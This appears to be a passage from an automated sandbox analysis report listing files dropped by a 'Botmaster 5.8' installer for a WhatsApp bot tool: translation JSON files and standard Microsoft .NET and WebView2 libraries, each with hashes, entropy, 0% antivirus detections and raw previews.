                                                                                                                                                                                                                Preview:[.. {.. "Key": "FrmAdd.BtnOK",.. "Text": "Okay".. },.. {.. "Key": "FrmAdd.BtnCancel",.. "Text": "Cancelar".. },.. {.. "Key": "FrmAdd.Label1",.. "Text": "C.digo de pa.s".. },.. {.. "Key": "FrmAdd",.. "Text": "Agregar c.digo de pa.s".. },.. {.. "Key": "FrmAdd.FamiliarAccountBtnOk",.. "Text": "Okay".. },.. {.. "Key": "FrmAdd.FamiliarAccountBtnCancel",.. "Text": "Cancelar".. },.. {.. "Key": "FrmAdd.FamiliarAccountLabel1",.. "Text": "N.mero de cuenta de Whatsapp".. },.. {.. "Key": "FrmAdd.FamiliarAccountLabel2",.. "Text": "Aseg.rese de que la cuenta que agregue sea una cuenta de WhatsApp y que .l reciba mensajes de usted".. },.. {.. "Key": "FrmAdd.FamiliarAccountText",.. "Text": "Agregar cuenta familiar de Whatsapp".. },.. {.. "Key": "FrmAdd.MessageBtnOK",.. "Text": "Okay".. },.. {.. "Key": "FrmAdd.MessageBtnCancel",.. "Text": "Cancelar".. },.. {.. "Key": "FrmAdd.MessageLabel1",.. "Text": "

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Languages\Fran ais.json

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):36262
                                                                                                                                                                                                                Entropy (8bit):4.831114510674506
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:/DAXfJT0s5LLaLJLJ/YefttFMVYrfduCMA6JdnmO:/DCJT0s5LeLJ9YqtLMVYDduCMAanmO
                                                                                                                                                                                                                MD5:EE4C22BAEEDC03D0582829017F5D7C13
                                                                                                                                                                                                                SHA1:F26A3A32FB37B300D41F03D3D914D1CBED432C5E
                                                                                                                                                                                                                SHA-256:D844F1F0F8CA5D5D4CDAB2E1C317259FAE76ADE680D29309C2DEBD8311351BF9
                                                                                                                                                                                                                SHA-512:5019D9F664B3C93E907B865EFA45441510CFB9C9FD0E106EAA258963E161F861B448DF39D800067276AAED57376B6FD277EA27DBF11D34A3023B94C248C75217
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[.. {.. "Key": "FrmAdd.BtnOK",.. "Text": "OK".. },.. {.. "Key": "FrmAdd.BtnCancel",.. "Text": "Annuler".. },.. {.. "Key": "FrmAdd.Label1",.. "Text": "Code postal".. },.. {.. "Key": "FrmAdd",.. "Text": "Ajouter le code du pays".. },.. {.. "Key": "FrmAdd.FamiliarAccountBtnOk",.. "Text": "OK".. },.. {.. "Key": "FrmAdd.FamiliarAccountBtnCancel",.. "Text": "Annuler".. },.. {.. "Key": "FrmAdd.FamiliarAccountLabel1",.. "Text": "Num.ro de compte Whatsapp".. },.. {.. "Key": "FrmAdd.FamiliarAccountLabel2",.. "Text": "Veuillez vous assurer que le compte que vous ajoutez est un compte WhatsApp et qu'il re.oit des messages de votre part".. },.. {.. "Key": "FrmAdd.FamiliarAccountText",.. "Text": "Ajouter un compte familier Whatsapp".. },.. {.. "Key": "FrmAdd.MessageBtnOK",.. "Text": "OK".. },.. {.. "Key": "FrmAdd.MessageBtnCancel",.. "Text": "Annuler".. },.. {.. "Key": "FrmAdd.MessageLabel1",.. "Text": "

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Languages\Portugu s.json

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):31667
                                                                                                                                                                                                                Entropy (8bit):5.065797656202188
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:BJiZUJmFzGkewrclfom+wXMzmWF7LusTHy5kXbrfZmQUKOIcL6O5T+XgAXPOxjG9:1boafomlqmWpHTHukXBuBcO5YgyQS9
                                                                                                                                                                                                                MD5:B1D1D7A7C064EB0D4428E2EA6B7B39F1
                                                                                                                                                                                                                SHA1:07B9F9E4436EE2B8B90D6B3ABDB025E62B20CF38
                                                                                                                                                                                                                SHA-256:0FE36A0C346F80EA9CAA0D046A699F7A9907491CF8D02F8059D9A75EBA6FE826
                                                                                                                                                                                                                SHA-512:31535A6FB8EA7A253C20F4C6CA5AFEFF18597718DA346CB2F834FA54DE1F6B587739016767E97A3544DA10C46086AEB9417C03F402600D80B9EF337B9F55D448
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[..{..."Key": "FrmAdd.BtnOK",..."Text": "OK"..},..{..."Key": "FrmAdd.BtnCancel",..."Text": "Cancelar"..},..{..."Key": "FrmAdd.Label1",..."Text": "C.digo do pa.s"..},..{..."Key": "FrmAdd",..."Text": "Adicionar c.digo do pa.s"..},..{..."Key": "FrmAdd.FamiliarAccountBtnOk",..."Text": "OK"..},..{..."Key": "FrmAdd.FamiliarAccountBtnCancel",..."Text": "Cancelar"..},..{..."Key": "FrmAdd.FamiliarAccountLabel1",..."Text": "N.mero da conta do Whatsapp"..},..{..."Key": "FrmAdd.FamiliarAccountLabel2",..."Text": "Verifique se a conta que voc. adicionou . uma conta do whatsapp e ele est. recebendo mensagens suas"..},..{..."Key": "FrmAdd.FamiliarAccountText",..."Text": "Adicionar conta familiar do Whatsapp"..},..{..."Key": "FrmAdd.MessageBtnOK",..."Text": "OK"..},..{..."Key": "FrmAdd.MessageBtnCancel",..."Text": "Cancelar"..},..{..."Key": "FrmAdd.MessageLabel1",..."Text": "mensagem"..},..{..."Key": "FrmAdd.MessageText",..."Text": "Adicionar mensagem"..},..{..."Key": "FrmAdvanced.BtnAddFamilia

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Languages\indonesia.json

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26503
                                                                                                                                                                                                                Entropy (8bit):5.067472079756546
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:/NILIWmsjLr+ahEfQYTRux9AocDqAWy+i/mmzOjvRdxX:/ojZhEfQYT0fDewqmmz8vRdxX
                                                                                                                                                                                                                MD5:638FDEE0F5D4F4F5A4EA5EDE8BDCAFCA
                                                                                                                                                                                                                SHA1:C8969FA74200968A38C82630C4B43E0A7912441E
                                                                                                                                                                                                                SHA-256:4A25D0F19B860CEE7A2CA6AEEEE4DF6612E243EBCAC59F1DF16A3E176CC3C2DC
                                                                                                                                                                                                                SHA-512:3E970AEDCF6676B2DD95B1B836760FBADD74CE91C4872587BCBB995611C572EB47D94911EB98661D071824D5259E1E042ABF56CB24CC6E32E5713B2E5477945C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[..{"Key":"FrmAdd.BtnOK","Text":"OK"},..{"Key":"FrmAdd.BtnCancel","Text":"Batal"},..{"Key":"FrmAdd.Label1","Text":"Kode Negara"},..{"Key":"FrmAdd","Text":"Tambah Kode Negara"},..{"Key":"FrmAdd.FamiliarAccountBtnOk","Text":"OK"},..{"Key":"FrmAdd.FamiliarAccountBtnCancel","Text":"Batal"},..{"Key":"FrmAdd.FamiliarAccountLabel1","Text":"Nomor Akun Whatsapp"},..{"Key":"FrmAdd.FamiliarAccountLabel2","Text":"Harap pastikan bahwa akun yang Anda tambahkan itu adalah akun whatsapp dan dia menerima pesan dari Anda"},..{"Key":"FrmAdd.FamiliarAccountText ","Text":"Tambahkan Akun familiar Whatsapp"},..{"Key":"FrmAdd.MessageBtnOK","Text":"OK"},..{"Key":"FrmAdd.MessageBtnCancel","Text":"Batal"},..{"Key":"FrmAdd.MessageLabel1","Text":"Pesan"},..{"Key":"FrmAdd.MessageText ","Text":"Tambah Pesan"},..{"Key":"FrmAdvanced.BtnAddFamiliarAccount","Text":"Tambah"},..{"Key":"FrmAdvanced.BtnDeleteFamiliarAccount","Text":"Hapus"},..{"Key":"FrmAdvanced.BtnAddMessages","Text":"Tambah"},..{"Key":"FrmAdvanced.BtnDele

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Bcl.AsyncInterfaces.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):22144
                                                                                                                                                                                                                Entropy (8bit):6.434408185018128
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:O/9b512C4dABe070VJI0Ftdalemxxf34wqsWeb/WjR/uPHRN7Y5slu6o:O/f1IDjV9UPPpWRMkT
                                                                                                                                                                                                                MD5:48EFE61D6CA3054309907B532D576D2A
                                                                                                                                                                                                                SHA1:F36403AABB16540C93FB35245EC0B4E435628AAE
                                                                                                                                                                                                                SHA-256:295AF2142D9214F3FD84EAFE4778DCA119BE7E0229F14B6BA8D5269C2F1E2E78
                                                                                                                                                                                                                SHA-512:778E7C4675D8FDE9E083230213D2EFA19AA6924FE892ED74FA1EA2EC16743BB14B99B51856E75EAEF632D57BE7F36DD1BC7CE39A7C2B0435B2F3211BB19836A3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                • Filename: OrangeBot Installer - UAT (1.18.5.23313).msi, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: PostSharp-2024.0.4-rc.exe, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: MDE_File_Sample_4e8af2004a77f531e655e2e5cb669c388d0655c9.zip, Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Q..........." ..0..&...........E... ...`....... ....................................`.................................[E..O....`...............2...$..........hD..T............................................ ............... ..H............text....%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................E......H.......4&.......................C........................................(....*..(....*.0....................(....}.....*6.|.....(...+*:.|......(...+*:.|......(...+*2.|....(....*..{....%-.&.|....s.....(....%-.&.{....*"..(....*>..}......}....*..0...........{....o........{....(....*Z..}......}......}....*N.{......{....s ...*N.{.....{.....s ...*v.{.....{....o!....{....s"...*..(....*"..s....*.0.....................s#...*&...s#...*..{$...*"..}$...*.0..F.........{%....Xh}%.....}&.

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Bcl.AsyncInterfaces.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (321), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18215
                                                                                                                                                                                                                Entropy (8bit):4.720079384519439
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:XgOpngSae6jWuTPP/xM2fB8qnmltJ5XZzRzgqW81Fu3DRmfCh7sE+siDBQsFaIs7:0FQa+TDm
                                                                                                                                                                                                                MD5:0737B770BA5D854D4887A8F4D9C8DE04
                                                                                                                                                                                                                SHA1:40A8A356D807D71C102C91D68AD1A0AD6E3FDDA6
                                                                                                                                                                                                                SHA-256:CA53D9B1BBEA04C30DB4186B015B7C57DCE7C5ECDF1CFAC9E4AFE9FFCF6910F0
                                                                                                                                                                                                                SHA-512:39A48874D547F714922F4864D3A34C842AC0898B09040796A9046182C093E3CA70F1D20F5D616721129E8D7F6A1F1FDEB3C8277C6BB2EB53B6DC8EA5966003C7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>Microsoft.Bcl.AsyncInterfaces</name>.. </assembly>.. <members>.. <member name="T:System.Threading.Tasks.Sources.ManualResetValueTaskSourceCore`1">.. <summary>Provides the core logic for implementing a manual-reset <see cref="T:System.Threading.Tasks.Sources.IValueTaskSource"/> or <see cref="T:System.Threading.Tasks.Sources.IValueTaskSource`1"/>.</summary>.. <typeparam name="TResult"></typeparam>.. </member>.. <member name="F:System.Threading.Tasks.Sources.ManualResetValueTaskSourceCore`1._continuation">.. <summary>.. The callback to invoke when the operation completes if <see cref="M:System.Threading.Tasks.Sources.ManualResetValueTaskSourceCore`1.OnCompleted(System.Action{System.Object},System.Object,System.Int16,System.Threading.Tasks.Sources.ValueTaskSourceOnCompletedFlags)"/> was called before the operation completed,.. or <see cref="F:System.

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.OLE.Interop.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):136792
                                                                                                                                                                                                                Entropy (8bit):6.27629274988875
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:eB4SGu9A07O5tp+zcKow+YhYZq1oj6ii8oDgpyd/v6t8oVZJQAD:eKSv20q5tp+Abw+YhYZq1ojlhvJQq
                                                                                                                                                                                                                MD5:08877FFE07AE1A2561BAC5B9B7832529
                                                                                                                                                                                                                SHA1:6EB64663606A4E1D0248480FB06EAD753094D4C7
                                                                                                                                                                                                                SHA-256:17AE46195415E7441C35EE200CFDD7F70888A1A4B5E5B80190555F234473C2C9
                                                                                                                                                                                                                SHA-512:8FE1B00CD0F9C54E4BAE6597F3669AFD58B07F490EC458A48DA6264026CB001D423B66880050AD7EE63EC12A7A3EE2120C4210C9E8296380677EF598171C1975
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..J...........!......... .......... ........>I. ..............................`.....@.....................................K.......P...............XF........................................................... ............... ..H............text....... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.OLE.Interop.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (520), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):440930
                                                                                                                                                                                                                Entropy (8bit):5.127759550925411
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:VypYKpKPvaUWBzg/xpHgxVD3rex3yasEd75w0hJzl+aUe89/wmvrz8gMJGJ9pYXK:rF3kEd75wiJru/wCrz8gMJGJ3T
                                                                                                                                                                                                                MD5:4B7138427A0C03C923051D66B7E375EE
                                                                                                                                                                                                                SHA1:AAC3A0C453ED22084C16FCB4ED5EFA3854904AEC
                                                                                                                                                                                                                SHA-256:E21FD392ADACB7376AF9A6C25E78EB4D46254AB29C5AFAF963909DCBEA21204D
                                                                                                                                                                                                                SHA-512:C16C1573FD418573F8F64E0445834BD3E3287F1DDFC7885F329790176036847AAAEB18DC3AAAC096D757407BEA834308C2327BE8D4C0A31358BF634BF7903CAA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>Microsoft.VisualStudio.OLE.Interop</name>.. </assembly>.. <members>.. <member name="F:Microsoft.VisualStudio.OLE.Interop.BIND_OPTS2.cbStruct">.. <summary>Represents the size of the <see cref="T:Microsoft.VisualStudio.OLE.Interop.BIND_OPTS2" /> structure in bytes.</summary>.. </member>.. <member name="F:Microsoft.VisualStudio.OLE.Interop.BIND_OPTS2.dwClassContext">.. <summary>Represents the class context that is to be used for instantiating the object.</summary>.. </member>.. <member name="F:Microsoft.VisualStudio.OLE.Interop.BIND_OPTS2.dwTickCountDeadline">.. <summary>Represents the clock time in milliseconds.</summary>.. </member>.. <member name="F:Microsoft.VisualStudio.OLE.Interop.BIND_OPTS2.dwTrackFlags">.. <summary>Represents a value that a moniker can use during link tracking.</summary>.. </member>.. <member name="F:Microsoft.VisualStudio.OLE.Interop.BIND_OPT

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.Shell.Interop.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266008
                                                                                                                                                                                                                Entropy (8bit):6.132716185250674
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:/12Ehityu0E8E9ExE9ElfkoEfE5tD1XMEQ0jEpOtnQlWtX7Eb3enP5wdGmLjZmXr:/fSHJGidFLjZmiSKYG8/FbYF3V6jp
                                                                                                                                                                                                                MD5:EAC1FD535EFF13B35B09D587D625EF1B
                                                                                                                                                                                                                SHA1:F6AFBF7830E4BB04C3D1AF67E1A70892CE41CE06
                                                                                                                                                                                                                SHA-256:52DD34CF681505AB03A48A5CE591ABF1953D4261E01F2BCACD1B80045FE26E83
                                                                                                                                                                                                                SHA-512:2212BBAD1E51D31CA0083477A5CA781FFAEA42DC2D6BBA0A2FB8721B5A6E3D70C2180AE94E5800A6B8BA4434C1FA6DC9B3057303D1146A8DCEB74A8EB982A0A5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... G...........!......... ........... ........@.. ...............................b....@.................................L...O.......P................?........................................................... ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.Shell.Interop.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (529), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1740574
                                                                                                                                                                                                                Entropy (8bit):5.049966346933638
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:6IPiSqOVR54taF/K47KmuOr+yci2fn0FiApCWT1ea7Vw/9aiZWODkUtip/NbVcmc:fdWtic/R
                                                                                                                                                                                                                MD5:D9069D69101F75A43915F7500D670DCC
                                                                                                                                                                                                                SHA1:7565C84D808FF896CBAAAD69A62FA95E32D889B9
                                                                                                                                                                                                                SHA-256:5675A0489FD170D773AE30B278A5020467801D81031258D8E732588826977C7F
                                                                                                                                                                                                                SHA-512:A1437416E0E487EBE13B809462C34789F319BCBFC9B73BDC6818054C9633728D9FFEFB3C57DC4B6753308316B384591C8DAE774EE31C9096358EB138E02CD2C1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>Microsoft.VisualStudio.Shell.Interop</name>.. </assembly>.. <members>.. <member name="F:Microsoft.VisualStudio.Shell.Interop.AllColorableItemInfo.bAutoBackgroundValid">.. <summary>Indicates whether <see cref="F:Microsoft.VisualStudio.Shell.Interop.AllColorableItemInfo.crAutoBackground" /> contains a valid color value. </summary>.. </member>.. <member name="F:Microsoft.VisualStudio.Shell.Interop.AllColorableItemInfo.bAutoForegroundValid">.. <summary>Indicates whether <see cref="F:Microsoft.VisualStudio.Shell.Interop.AllColorableItemInfo.crAutoForeground" /> contains a valid color value. </summary>.. </member>.. <member name="F:Microsoft.VisualStudio.Shell.Interop.AllColorableItemInfo.bDescriptionValid">.. <summary>Indicates the <see cref="F:Microsoft.VisualStudio.Shell.Interop.AllColorableItemInfo.bstrDescription" /> contains a valid description string </summary>.. </member>..

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.TextManager.Interop.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                Entropy (8bit):5.91450864923579
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:o71yxMGwXWWY7HfCB21HcA+yxUv/gKw8l7355Ee:yAlMJiUHw8tf
                                                                                                                                                                                                                MD5:B6ED0F4FB32D0FC2AD7072B2AF39E6E2
                                                                                                                                                                                                                SHA1:E873CE91823EF931F20C7D1FC9ECA59B69CF07B4
                                                                                                                                                                                                                SHA-256:B9EC0543F9B3F7A6B49020763984753C72DBE67D678C826389578A5097A6D765
                                                                                                                                                                                                                SHA-512:B25259A3F0C95289FF88B8FD89B9CFDD730EB4E399E48B71EA73FF2C492328E0B2D0A10A02C5D6FCDF2C15B4425DE5539A70013283BC3490AD1CD3B13EA05AC3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..J...........!......... ......>.... ........LI. ....................................@....................................W.......P............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.TextManager.Interop.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (636), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):829861
                                                                                                                                                                                                                Entropy (8bit):5.002159761339964
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:KfC6OxR3nCLsPE1fyKFsGq2aWxZNB4Q/a23OK3nS:X
                                                                                                                                                                                                                MD5:AA359347E85056F88218307730174C9B
                                                                                                                                                                                                                SHA1:BA6B10B5F031D5A661005FFF0143BEEEF8B03606
                                                                                                                                                                                                                SHA-256:A38C85A3E694A237B66894F7032753D892D33501F7109820EA36690A4B4A5629
                                                                                                                                                                                                                SHA-512:14C0DA54165B71DA7BF5ADEDB4E3CDAAFA2C22E08E11909A2FBA4515EFA4A7D93D82DD10FE72F68B8FB2331DABABBC2181689FCDD75CFB78AFD6956F5EDFB578
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>Microsoft.VisualStudio.TextManager.Interop</name>.. </assembly>.. <members>.. <member name="T:Microsoft.VisualStudio.TextManager.Interop.__PROMPTONLOADFLAGS">.. <summary>Flags to prompt user for an encoding on an open with specified codepage.</summary>.. </member>.. <member name="F:Microsoft.VisualStudio.TextManager.Interop.__PROMPTONLOADFLAGS.codepageNoPrompt">.. <summary>Prompt user.</summary>.. </member>.. <member name="F:Microsoft.VisualStudio.TextManager.Interop.__PROMPTONLOADFLAGS.codepagePrompt">.. <summary>Do not prompt user.</summary>.. </member>.. <member name="T:Microsoft.VisualStudio.TextManager.Interop.__VSFINDBUFFERFLAGS">.. <summary>Indicates that a buffer boundary begins or ends a line, without requiring white space characters in the buffer. </summary>.. </member>.. <member name="F:Microsoft.VisualStudio.TextManager.Interop.__VSFINDBUFFERFLAGS.FINDB

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):306600
                                                                                                                                                                                                                Entropy (8bit):5.653559725035333
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:JE4DIxId/rUje1mQ9pRFIEIEEIcgCepM1S0LQQs1hPyIEeCku1hLvhbSO0YO5fbf:G4aId/rUje1mQ9pRFIEIEEIcgCepM1Sr
                                                                                                                                                                                                                MD5:6987A428F6F311AB950E1C92A66FB938
                                                                                                                                                                                                                SHA1:1B438F9390CF14059BEEA4E47AE157142329E102
                                                                                                                                                                                                                SHA-256:03DBE9EFF9FA655C5AE7C247E3ED51E1F2A0C9CF3656CBD9461FC4A8D8A0AD15
                                                                                                                                                                                                                SHA-512:BB61231C640A5A7DDA4D6EB51854B5A0D94B633A492FFDEBC11F4DFCCB07905BD0F440D307D0A32637ECCF18C9AB0B6CA2FB236A48802ED7ACABC862D07CF006
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yd(b.........." ..0.................. ........... ..............................*.....`.................................d...O........................#..........,................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......|O..0P...........................................................0..G.........((...}.......}.......}.......}.......}......|......(...+..|....(*...*..0../........{....- ..{....t....}.......r...p.s+...z.{....*................."..}....*....0../........{....- ..{....t....}.......rZ..p.s+...z.{....*................."..}....*....0../........{....- ..{....t....}.......r...p.s+...z.{....*................."..}....*....0../........{....- ..{....t ...}.......r...p.s+...z.{....*.

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (801), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):337579
                                                                                                                                                                                                                Entropy (8bit):4.640382180669009
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:rVzdEO4am+70Quf4YufqSispK2sSj4Jb2sOE9+VQLtK3il849zZr2QEsvLK6YsY6:rVzdEO4am+7RufDufqSispK2sSj4Jb2s
                                                                                                                                                                                                                MD5:CBD9EB9F9C15662654880A878AFF3D71
                                                                                                                                                                                                                SHA1:107370E14645C5D8B025CDBC8A12D1675506F1E0
                                                                                                                                                                                                                SHA-256:6860C8D8D2AC50A3CEF4D216966D0AD04AD5A1AD9C6B4AC6B18891E2392CC75C
                                                                                                                                                                                                                SHA-512:B741A3DDFD96D3A989AE1868BBC5B338A24243A131975033A32FA005DE642098272E5535F9CD78B735CD65FFB8FB6FCCB9436C7F9B96607E17F605BE2AF37E35
                                                                                                                                                                                                                Malicious:false
